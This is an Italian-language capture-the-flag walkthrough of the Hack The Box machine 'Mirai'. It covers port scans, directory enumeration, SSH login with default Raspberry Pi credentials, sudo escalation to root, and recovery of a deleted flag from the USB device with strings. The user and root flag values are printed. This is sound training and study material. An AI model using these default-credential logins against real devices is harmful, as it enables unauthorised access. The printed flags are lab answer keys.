10.10.10.48


sudo nmap -vv -p- -T4 -n -Pn 10.10.10.48                                                                                          
[sudo] password for kali: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-16 17:14 EDT
Initiating SYN Stealth Scan at 17:14
Scanning 10.10.10.48 [65535 ports]
Discovered open port 53/tcp on 10.10.10.48
Discovered open port 80/tcp on 10.10.10.48
Discovered open port 22/tcp on 10.10.10.48
Discovered open port 32400/tcp on 10.10.10.48
Discovered open port 1288/tcp on 10.10.10.48
Discovered open port 32469/tcp on 10.10.10.48
Completed SYN Stealth Scan at 17:14, 20.18s elapsed (65535 total ports)
Nmap scan report for 10.10.10.48
Host is up, received user-set (0.052s latency).
Scanned at 2022-03-16 17:14:02 EDT for 20s
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE  REASON
22/tcp    open  ssh      syn-ack ttl 63
53/tcp    open  domain   syn-ack ttl 63
80/tcp    open  http     syn-ack ttl 63
1288/tcp  open  navbuddy syn-ack ttl 63
32400/tcp open  plex     syn-ack ttl 63
32469/tcp open  unknown  syn-ack ttl 63




sudo nmap -sC -sV -p 22,53,80,1288,32400,32469 10.10.10.48                                                                                                                                                                        130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-16 17:15 EDT
Nmap scan report for 10.10.10.48
Host is up (0.050s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp    open  domain  dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
1288/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
|_http-title: Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-favicon: Plex
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel



Port 80:


c'è solo una pagina bianca, gobuster:

sudo gobuster  dir -u http://10.10.10.48/ -w /usr/share/wordlists/dirb/big.txt -t 100 -x .php,.js,.txt,.htm,.html -k | grep -v 61
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.48/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,htm,html,php,js
[+] Timeout:                 10s
===============================================================
2022/03/16 17:16:10 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 0] [--> http://10.10.10.48/admin/]
/versions             (Status: 200) [Size: 18]   


http://10.10.10.48/admin/           -------> pi-hole application


cercando online le credenziali per pi-hole ho trovato anche quelle di default per accedere con ssh a raspberry:

pi:raspberry

coì riesco ad accedere con ssh:

ssh pi@10.10.10.48

pi@raspberrypi:~ $ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi)


pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

quindi basta fare sudo su

pi@raspberrypi:~ $ sudo su
root@raspberrypi:/home/pi# id
uid=0(root) gid=0(root) groups=0(root)
root@raspberrypi:/home/pi# cat Desktop/user.txt 
ff837707441b257a20e32199d7c8838d

root@raspberrypi:/home/pi# 
root@raspberrypi:/home/pi# 
root@raspberrypi:/home/pi# cat /root/root.txt 
I lost my original root.txt! I think I may have a backup on my USB stick...


quindi root flag non è dove si trova di solito, devo cercarlo in una usb stick

root@raspberrypi:/home/pi# cat /etc/fstab
# UNCONFIGURED FSTAB FOR BASE SYSTEM
aufs / aufs rw 0 0
tmpfs /tmp tmpfs nosuid,nodev 0 0
/dev/sdb /media/usbstick ext4 ro,suid,dev,noexec,auto,user,async 0 0
root@raspberrypi:/home/pi# ls -lart /media/usbstick/
total 18
drwxr-xr-x 3 root root  4096 Aug 14  2017 ..
drwx------ 2 root root 12288 Aug 14  2017 lost+found
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
drwxr-xr-x 3 root root  1024 Aug 14  2017 .
root@raspberrypi:/home/pi# cat /media/usbstick/damnit.txt 
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James
root@raspberrypi:/home/pi# 



quasi....


visto che sono su linux posso usare strings su qualunque cosa (tutto è un file in linux) e infatti usando strings: (/dev/sdb è il device corrispondente a /media/usbstick)

root@raspberrypi:/home/pi# strings /dev/sdb                                 
>r &    
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James


riesco a leggere anche dati cancellati, come il flag di root:


3d3e483143ff12ec505d026fa13e020b



